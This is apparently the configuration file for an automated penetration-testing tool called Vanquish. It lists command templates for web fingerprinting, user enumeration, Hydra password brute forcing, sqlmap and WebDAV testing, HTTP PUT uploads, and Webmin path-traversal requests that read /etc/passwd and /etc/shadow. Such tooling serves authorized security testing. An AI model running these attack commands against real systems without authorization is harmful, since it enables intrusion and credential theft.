[HTTP What Web]
Command: whatweb http://<target>:<port>/ -v -a 3 --color=never >> <output>.txt
Findings Services: (\w+\[.+\])
[HTTPS What Web]
Command: whatweb https://<target>:<port>/ -v -a 3 --color=never >> <output>.txt
Findings Services: (\w+\[.+\])
[HTTP What Web All Urls]
Command: whatweb <FindingsList urlshttp> -v -a 3 --color=never >> <output>.txt
Findings Services: (\w+\[.+\])
[HTTPS What Web All Urls]
Command: whatweb <FindingsList urlshttps> -v -a 3 --color=never >> <output>.txt
Findings Services: (\w+\[.+\])
[HTTP Wordpress Scan 1]
Command: wpscan --url http://<target>:<port> <nmap proxy server> --batch --enumerate >> <output>.txt
[HTTPS Wordpress Scan 1]
Command: wpscan --url https://<target>:<port> <nmap proxy server> --batch --enumerate >> <output>.txt
[HTTP Wordpress Scan 2]
Command: wpscan --url http://<target>:<port>/wp/ <nmap proxy server> --batch --enumerate >> <output>.txt
[HTTPS Wordpress Scan 2]
Command: wpscan --url https://<target>:<port>/wp/ <nmap proxy server> --batch --enumerate >> <output>.txt
[HTTP BlindElephant Guess]
Command: /usr/bin/BlindElephant.py http://<target>:<port>/ guess >> <output>.txt
[HTTPS BlindElephant Guess]
Command: /usr/bin/BlindElephant.py https://<target>:<port>/ guess >> <output>.txt
[HTTP BlindElephant Guess All Urls]
Command: /usr/bin/BlindElephant.py <FindingsList urlshttp> guess >> <output>.txt
[HTTPS BlindElephant Guess All Urls]
Command: /usr/bin/BlindElephant.py <FindingsList urlshttps> guess >> <output>.txt
[HTTP Wordpress Scan All Urls]
Command: wpscan --url <FindingsList urlshttp> <nmap proxy server> --batch >> <output>.txt
[HTTPS Wordpress Scan All Urls]
Command: wpscan --url <FindingsList urlshttps> <nmap proxy server> --batch >> <output>.txt
[HTTP Nmap Vuln Scan]
Command: nmap -v -p <port> --script=http-vuln* <target> -d -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Vulnerabilities: \| [a-zA-Z0-9\-_~]+\:((\s*\|\s+.+$)+\s+\|_\s+.+$)
[HTTP Cewl Password List]
Command: cewl http://<target>:<port>/ -m 6 -w <output>PW.txt >> <output>.txt
Findings PasswordList: (.+)
[HTTPS Cewl Password List]
Command: cewl https://<target>:<port>/ -m 6 -w <output>PW.txt >> <output>.txt
Findings PasswordList: (.+)
[HTTP Cewl Password List All Urls]
Command: cewl <FindingsList urlshttp> -m 6 -w <output>PW.txt >> <output>.txt
Findings PasswordList: (.+)
[HTTPS Cewl Password List All Urls]
Command: cewl <FindingsList urlshttps> -m 6 -w <output>PW.txt >> <output>.txt
Findings PasswordList: (.+)
[HTTP Robots]
Command: curl http://<target>:<port>/robots.txt <nmap proxy server> --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" --connect-timeout 30 --max-time 180 |grep 'Allow\|Disallow' | sed "s|[a-zA-Z]*\:[[:blank:]]*/|http://<target>:<port>/|" >> <output>.txt
Findings UrlsHttp: (^http.+)
[HTTPS Robots]
Command: curl https://<target>:<port>/robots.txt <nmap proxy server> --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" --connect-timeout 30 --max-time 180 |grep 'Allow\|Disallow' | sed "s|[a-zA-Z]*\:[[:blank:]]*/|https://<target>:<port>/|" >> <output>.txt
Findings UrlsHttps: (^http.+)
[HTTP Method Check]
Command: nmap -p <port> --script http-methods --script-args http-methods.url-path='<FindingsList urlshttprelative>' <target> <nmap proxy server> --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings VulnerableHTTPPutMethod: (.+PUT.+)
[HTTPS Method Check]
Command: nmap -p <port> --script http-methods --script-args http-methods.url-path='<FindingsList urlshttpsrelative>' <target> <nmap proxy server> --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings VulnerableHTTPSPutMethod: (.+PUT.+)
#= User Enumeration =========================
[SMTP Emum Users Name] # http://pentestmonkey.net/tools/smtp-user-enum
Command: smtp-user-enum -U <namelist> -t <target> -p <port> >> <output>.txt
Findings Users: (\w+)@.+: Exists
Findings PasswordList: (\w+)@.+: Exists
[SMTP Emum Users Unix Users] # http://pentestmonkey.net/tools/smtp-user-enum
Command: smtp-user-enum -U <unix-users> -t <target> -p <port> >> <output>.txt
Findings Users: (\w+)@.+: Exists
Findings PasswordList: (\w+)@.+: Exists
[SMTP Emum Users All Dicts] # http://pentestmonkey.net/tools/smtp-user-enum
Command: smtp-user-enum -U <List Users> -t <target> -p <port> >> <output>.txt
Findings Users: (\w+)@.+: Exists
Findings PasswordList: (\w+)@.+: Exists
[SMTP Nmap Enum Users]
Command: nmap -v --script smtp-enum-users -p <port> <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml -d --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Users: \|_*\s+\w+, (\w+)
Findings PasswordList: \|_*\s+\w+, (\w+)
[SMB Nmap User Enumeration]
Command: nmap -sU -sS --script=smb-enum-users -p U:137,T:139 <target> <nmap proxy server> -oN <output>.nmap -oX <output>.xml --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings Users: ^\|\s+\w+\\(\w+)\s+\(
Findings PasswordList: ^\|\s+\w+\\(\w+)\s+\(
[RPC Enum4Linux User Enumeration]
Command: enum4linux -k root,Administrator -r <target> >> <output>.txt
Findings Users1: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Users2: ^user:\[(.+)\] rid:\['
Findings PasswordList1: ^user:\[(.+)\] rid:\['
Findings PasswordList2: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Services: ^Domain.+Server=\[(.+)\]
Findings Announce Trans2open: Server=\[(Samba 2\.2.+)\]
Findings Domain1: ^\[.+domain/workgroup\sname:\s+(.+)
Findings Domain2: Domain Name: (.+)$
Findings PasswordList3: ^\[.+domain/workgroup\sname:\s+(.+)
Findings PasswordList4: Domain Name: (.+)$
Findings Shares: ^\[V\]\s+Attempting map to share (.+) with command:
Findings Groups1: ^group:\[(.+)\] rid:\[
Findings Groups2: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordList5: ^group:\[(.+)\] rid:\[
Findings PasswordList6: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordPolicy1: ^\[\+\] Password Info for Domain: \w+\n+(\n^(\s.+$\n)+)^\[\w+\]
Findings PasswordPolicy2: \[\+\] Retieved partial password policy with rpcclient:\n(\s+.+\s.+)\s+=
[Ident ident-user-enum Service Users]
Command: ident-user-enum <target> 22 80 443 21 23 135 139 445 53 161 25 3389 3306 1433 123 512 5800 5900 79 111 389 2049 >> <output>.txt
Findings Users: .+\:\d+\s+(.+)
Findings PasswordList: .+\:\d+\s+(.+)

#= Test Credential Lists ==============================
[Hydra Test Credentials]
Command: hydra -C <output folder>/credentials.txt <target> <service> -s <port> -t 8 -e ns -o <output>.hydra
Findings Credentials: ^\[.+(login:.+)
Findings Announce1: ^\[.+(login:.+)
[Hydra Test Usernames and Passwords]
Command: hydra -l <output folder>/users.txt -p <output folder>/passwords.txt  <target> <service> -s <port> -t 8 -e ns -o <output>.hydra
Findings Credentials: ^\[.+(login:.+)
Findings Announce1: ^\[.+(login:.+)


#= Hydra Password Brute Forcing =============================
[Hydra password list]
Command: hydra -L <Findings users> -P <Findings passwordlist> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra wfuzz-common]
Command: hydra -L <Findings users> -P <wfuzz-common> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra keyboard-patterns]
Command: hydra -L <Findings users> -P <keyboard-patterns> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra adobe-top-100]
Command: hydra -L <Findings users> -P <adobe-top-100> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra dirb-passwords-top-110]
Command: hydra -L <Findings users> -P <dirb-passwords-top-110> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra fastrack]
Command: hydra -L <Findings users> -P <fastrack> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra rockyou]
Command: hydra -L <Findings users> -P <rockyou> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra dirb-passwords-top-1050]
Command: hydra -L <Findings users> -P <dirb-passwords-top-1050> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra metasploit-passwords]
Command: hydra -L <Findings users> -P <metasploit-passwords> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra sql-map]
Command: hydra -L <Findings users> -P <sql-map> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt
Findings Credentials: ^\[.+(login:.+)
[Hydra 1 to 4  lowercase characters]
hydra -x 1:4:a -L <Findings users> <target> <service> -s <port> -t 8 -e ns -o <output>.hydra >> <output>.txt

# login:test@test.com password:TheP@ssw0rd!
# Hydra Supported Services:
#asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form
#http-proxy http-proxy-urlenum icq
#imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s]
#mssql mysql nntp oracle-listener
#oracle-sid pcanywhere pcnfs pop3[s] postgres
#rdp redis rexec rlogin rsh rtsp s7-300
#sip smb smtp[s] smtp-enum snmp socks5
#ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

#= Capture Screenshots of webpages found ========
# Lets capture screenshots of each HTTP/HTTPS web server found. Also lets take screenshots of the folders /files we uncovered with DIRB / GOBUSTER (Relative URLS)
[Screenshot]
Command: cutycapt --url=http://<target>:<port>/ --out=<output>.png --min-width=1366 --min-height=768 >> <output>.txt
[Screenshot S]
Command: cutycapt --url=https://<target>:<port>/ --out=<output>.png --min-width=1366 --min-height=768 >> <output>.txt
[Screenshot Rel]
Command: cutycapt --url=http://<target>:<port>/<FindingsList urlshttprelative> --out=<output><FindingsList urlshttprelative>.png --min-width=1366 --min-height=768 >> <output>.txt
[Screenshot RelS]
Command: cutycapt --url=https://<target>:<port>/<FindingsList urlshttpsrelative> --out=<output><FindingsList urlshttpsrelative>.png --min-width=1366 --min-height=768 >> <output>.txt

#= Exploits =============================
# Once we have creds lets see what we can do with them...
# Credentials are stored in the credential.txt file in the following format
#   login:test@test.com password:TheP@ssw0rd!
# Credentials can be manually added to this file in this format and tested against multiple services
# by rerunning vanquish.
# The dynamic replacement values <login> and <password> will execute the command for each set of credentials.
[Create File For Upload Test]
Command: echo Hello from Vanquish! > ./uploadtest.txt
[HTTP Put Method Exploit]
Command: nmap -p <port> <target> <nmap proxy server> --script http-put --script-args http-put.url='<FindingsList urlshttprelative>/uploadtest.txt',http-put.file='./uploadtest.txt' --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings ExploitHTTPPut: (.+successfully.+)
[HTTPS Put Method Exploit]
Command: nmap -p <port> <target> <nmap proxy server> --script http-put --script-args http-put.url='<FindingsList urlshttpsrelative>/uploadtest.txt',http-put.file='./uploadtest.txt' --host-timeout 20m --script-timeout 20m >> <output>.txt
Findings ExploitHTTPSPut: (.+successfully.+)
[MySQL Exploit Nmap Audit]
Command: nmap -p <port> <nmap proxy server> --script mysql-audit --script-args "mysql-audit.username='<login>',mysql-audit.password='<password>',mysql-audit.filename='nselib/data/mysql-cis.audit'" <target> --host-timeout 20m --script-timeout 20m >> <output>_<login>.txt
[Rdp Exploit]
Command: rdesktop -u <login> -p <password> <target>:<port> >> <output>_<login>.txt
[FTP Exploit]
Command: curl <nmap proxy server> ftp://<target>:<port>/ --user "<login>":"<password>" >> <output>_<login>.txt
[SMB Exploit Enum4Linux]
Command: enum4linux -u <login> -p <password> -a -M -v <target> >> <output>_<login>.txt
Findings Users1: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Users2: ^user:\[(.+)\] rid:\['
Findings PasswordList1: ^user:\[(.+)\] rid:\['
Findings PasswordList2: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Services: ^Domain.+Server=\[(.+)\]
Findings Announce Trans2open: Server=\[(Samba 2\.2.+)\]
Findings Domain1: ^\[.+domain/workgroup\sname:\s+(.+)
Findings Domain2: Domain Name: (.+)$
Findings PasswordList3: ^\[.+domain/workgroup\sname:\s+(.+)
Findings PasswordList4: Domain Name: (.+)$
Findings Shares: ^\[V\]\s+Attempting map to share (.+) with command:
Findings Groups1: ^group:\[(.+)\] rid:\[
Findings Groups2: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordList5: ^group:\[(.+)\] rid:\[
Findings PasswordList6: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordPolicy1: ^\[\+\] Password Info for Domain: \w+\n+(\n^(\s.+$\n)+)^\[\w+\]
Findings PasswordPolicy2: \[\+\] Retieved partial password policy with rpcclient:\n(\s+.+\s.+)\s+=
[RPC Exploit Enum4Linux]
Command: enum4linux -u <login> -p <password> -a -M -v <target> >> <output>_<login>.txt
Findings Users1: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Users2: ^user:\[(.+)\] rid:\['
Findings PasswordList1: ^user:\[(.+)\] rid:\['
Findings PasswordList2: ^S\-.+\s+\w+\\(.+)\s+\(\w+ User\)
Findings Services: ^Domain.+Server=\[(.+)\]
Findings Domain1: ^\[.+domain/workgroup\sname:\s+(.+)
Findings Domain2: Domain Name: (.+)$
Findings PasswordList3: ^\[.+domain/workgroup\sname:\s+(.+)
Findings PasswordList4: Domain Name: (.+)$
Findings Shares: ^\[V\]\s+Attempting map to share (.+) with command:
Findings Groups1: ^group:\[(.+)\] rid:\[
Findings Groups2: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordList5: ^group:\[(.+)\] rid:\[
Findings PasswordList6: ^S\-.+\s+\w+\\(.+)\s+\(.\w+ Group\)
Findings PasswordPolicy1: ^\[\+\] Password Info for Domain: \w+\n+(\n^(\s.+$\n)+)^\[\w+\]
Findings PasswordPolicy2: \[\+\] Retieved partial password policy with rpcclient:\n(\s+.+\s.+)\s+=
[HTTP SQLMap]
Command: sqlmap -u "http://<target>:<port>" --batch --crawl=5 --level 1 --risk 1 -f -a >> <output>.txt
[HTTPS SQLMap]
Command: sqlmap -u "https://<target>:<port>" --batch --crawl=5 --level 1 --risk 1 -f -a >> <output>.txt
[HTTP SQLMap Findings List urlshttp]
Command: sqlmap -u "http://<FindingsList urlshttp>:<port>" --batch --crawl=5 --level 1 --risk 1 -f -a >> <output>.txt
[HTTPS SQLMap Findings List urlshttps]
Command: sqlmap -u "https://<FindingsList urlshttps>:<port>" --batch --crawl=5 --level 1 --risk 1 -f -a >> <output>.txt
[Webmin Passwd Exploit]
Command: curl <nmap proxy server> http://<target>:<port>/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd >> <output>.txt
Findings Passwd: (root(.|\n)+)
[Webmin Shadow Exploit]
Command: curl <nmap proxy server> http://<target>:<port>/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow >> <output>.txt
Findings Shadow: (root(.|\n)+)
[HTTP Webdav]
Command: davtest -url http://<target>:<port>/ 2>> <output>.txt >> <output>.txt
Findings CreatedFolder: (MKCOL\s+SUCCEED:\s+Created\s+http.+)\n
Findings PutSuccess: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings ExecSuccess: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings Announce Webdav_Put: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings Announce Webdav_Exec: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
[HTTPS Webdav]
Command: davtest -url https://<target>:<port>/ 2>> <output>.txt >> <output>.txt
Findings CreatedFolder: (MKCOL\s+SUCCEED:\s+Created\s+http.+)\n
Findings PutSuccess: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings ExecSuccess: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings Announce Webdav_Put: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings Announce Webdav_Exec: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
[HTTP Webdav All URLS]
Command: davtest -url <FindingsList urlshttp> 2>> <output>.txt >> <output>.txt
Findings CreatedFolder: (MKCOL\s+SUCCEED:\s+Created\s+http.+)\n
Findings PutSuccess: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings ExecSuccess: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings Announce Webdav_Put: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings Announce Webdav_Exec: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
[HTTPS Webdav All URLS]
Command: davtest -url <FindingsList urlshttps> 2>> <output>.txt >> <output>.txt
Findings CreatedFolder: (MKCOL\s+SUCCEED:\s+Created\s+http.+)\n
Findings PutSuccess: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings ExecSuccess: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings Announce Webdav_Put: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
Findings Announce Webdav_Exec: (PUT\s+[a-zA-Z]+\s+SUCCEED:\s+http.+)\n
#= Metasploit Database Sync =============================
# Vanquish will load any findings into the Metasploit database
[Metasploit Start Database]
Command: systemctl start postgresql >> <output>.txt
[Metasploit Import Database]
Command: msfconsole -x "workspace -a <workspace>; db_import <output folder>/Nmap/**/*.xml; exit;" >> <output>.txt
[Metasploit Hosts Report]
Command: msfconsole -x "workspace <workspace>; hosts -o <output folder>/msfhosts.csv; exit;" >> <output>.txt
[Metasploit Services Report]
Command: msfconsole -x "workspace <workspace>; services -o <output folder>/msfservices.csv; exit;" >> <output>.txt

#= Username, Password and Directory Lists ==============================
[List Directories]
# 15 Lines
best15: /usr/share/wordlists/dirb/others/best15.txt
# 49 lines
mutations_common: /usr/share/wordlists/dirb/mutations_common.txt
# 110 lines
best110: /usr/share/wordlists/dirb/others/best110.txt
# 161 lines
catala: /usr/share/wordlists/dirb/catala.txt
# 197 lines
euskera: /usr/share/wordlists/dirb/euskera.txt
# 29 lines
extensions_common: /usr/share/wordlists/dirb/extensions_common.txt
# 10 lines
indexes: /usr/share/wordlists/dirb/indexes.txt
# 959 lines
small: /usr/share/wordlists/dirb/small.txt
# 1049 lines
best1050: /usr/share/wordlists/dirb/others/best1050.txt
# 449 lines
spanish: /usr/share/wordlists/dirb/spanish.txt
# 4614 lines
common: /usr/share/wordlists/dirb/common.txt
# 20469 lines
big: /usr/share/wordlists/dirb/big.txt
# 8607 lines
names: /usr/share/wordlists/dirb/others/names.txt
# 30 Lines
apache: /usr/share/wordlists/dirb/vulns/apache.txt
# 17 Lines
axis: /usr/share/wordlists/dirb/vulns/axis.txt
# 3494 Lines
cgis: /usr/share/wordlists/dirb/vulns/cgis.txt
# 21 Lines
coldfusion: /usr/share/wordlists/dirb/vulns/coldfusion.txt
# 291 Lines
domino: /usr/share/wordlists/dirb/vulns/domino.txt
# 2711 Lines fatwire_
pagenames: /usr/share/wordlists/dirb/vulns/pagenames.txt
# 101 Lines
fatwire: /usr/share/wordlists/dirb/vulns/fatwire.txt
# 43 Lines
frontpage: /usr/share/wordlists/dirb/vulns/frontpage.txt
# 238 Lines
hpsmh: /usr/share/wordlists/dirb/vulns/hpsmh.txt
# 579 Lines
hyperion: /usr/share/wordlists/dirb/vulns/hyperion.txt
# 59 Lines
iis: /usr/share/wordlists/dirb/vulns/iis.txt
# 36 Lines
iplanet: /usr/share/wordlists/dirb/vulns/iplanet.txt
# 19 Lines
jboss: /usr/share/wordlists/dirb/vulns/jboss.txt
# 129 Lines
jersey: /usr/share/wordlists/dirb/vulns/jersey.txt
# 13 Lines
jrun: /usr/share/wordlists/dirb/vulns/jrun.txt
# 60 Lines
netware: /usr/share/wordlists/dirb/vulns/netware.txt
# 1075 Lines
oracle: /usr/share/wordlists/dirb/vulns/oracle.txt
# 121 Lines
ror: /usr/share/wordlists/dirb/vulns/ror.txt
# 1111 Lines
sap: /usr/share/wordlists/dirb/vulns/sap.txt
# 1708 Lines
sharepoint: /usr/share/wordlists/dirb/vulns/sharepoint.txt
# 52 Lines
sunas: /usr/share/wordlists/dirb/vulns/sunas.txt
# 34 Lines
tests: /usr/share/wordlists/dirb/vulns/tests.txt
# 87 Lines
tomcat: /usr/share/wordlists/dirb/vulns/tomcat.txt
# 74 Lines
vignette: /usr/share/wordlists/dirb/vulns/vignette.txt
# 361 Lines
weblogic: /usr/share/wordlists/dirb/vulns/weblogic.txt
# 560 Lines
websphere: /usr/share/wordlists/dirb/vulns/websphere.txt

[List Users]
#4 Lines
postgres-users: /usr/share/wordlists/metasploit/postgres_default_user.txt
#6 Lines
tomcat-users: /usr/share/wordlists/metasploit/tomcat_mgr_default_users.txt
#13 Lines
http-users: /usr/share/wordlists/metasploit/http_default_users.txt
#15 Lines
mirai-users: /usr/share/wordlists/metasploit/mirai_user.txt
#112 Lines
unix-users: /usr/share/wordlists/metasploit/unix_users.txt
#920 Lines
service-default-users: /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt
#1909 Lines
namelist: /usr/share/wordlists/metasploit/namelist.txt
#8607 Lines
dirb-users: /usr/share/wordlists/dirb/others/names.txt

[List Passwords]
#4 Lines
postgres-pass: /usr/share/wordlists/metasploit/postgres_default_pass.txt
#6 lines
tomcat-pass: /usr/share/wordlists/metasploit/tomcat_mgr_default_pass.txt
#20 lines
keyboard-patterns: usr/share/wordlists/metasploit/keyboard-patterns.txt
#51 lines
wfuzz-common: /usr/share/wordlists/wfuzz/others/common_pass.txt
#100 lines
adobe-top-100: /usr/share/wordlists/metasploit/adobe_top100_pass.txt
#110 Lines
dirb-passwords-top-110: /usr/share/wordlists/dirb/others/best110.txt
#182 Lines
fastrack: /usr/share/wordlists/fasttrack.txt
#477 lines
fern-wifi: /usr/share/wordlists/fern-wifi/common.txt
#1000 Lines
ipmi-passwords: /usr/share/wordlists/metasploit/ipmi_passwords.txt
#1008 Lines
unix-passwords: /usr/share/wordlists/metasploit/unix_passwords.txt
#1049 Lines
dirb-passwords-top-1050: /usr/share/wordlists/dirb/others/best1050.txt
#1244 Lines
service-default-passwords: /usr/share/wordlists/metasploit/default_pass_for_services_unhash.txt
#88396 Lines
metasploit-passwords: /usr/share/wordlists/metasploit/password.lst
#1202867 Lines
sql-map: /usr/share/wordlists/sqlmap.txt
#14344392 Lines
rockyou: /usr/share/wordlists/rockyou.txt

#= Service Ports ==============================
# The following services will be associated with port numbers in cases where services cannot be identified by Nmap
[Service Ports]
always: 0
run once: -1
http: 80,8080,8081,8000,8008,8180,8888
https: 443,8443,9443
webmin: 10000
ftp: 21
telnet: 23
ssh: 22
msrpc: 135
netbios-ssn: 139
msrpc: 135,1025
smb: 445
wsdapi: 5357
dns: 53
snmp: 161
smtp: 25
rdp: 3389
mysql: 3306
ms-sql-s: 1433,27900
ntp: 123
rexec: 512
rlogin: 513
vnc: 5800,5900
finger: 79
rpc: 111
ldap: 389
ldaps: 636
nfs: 2049
james-admin: 4555
ident: 113
tftp: 69
#= Service Labels ==============================
# The following NMAP services will be replaced with labels in order to resolve service mismatches
[Service Labels]
ms-wbt-server: rdp
rpcbind: rpc
netbios-ssn: smb
microsoft-ds: smb
nfs_acl: nfs
nagios-nsca: ftp
snet-sensor-mgmt: webmin
http-proxy: http
#Vanquish config file
#= System Configuration ==============================
[System]
Debug: 0
Verbose: 0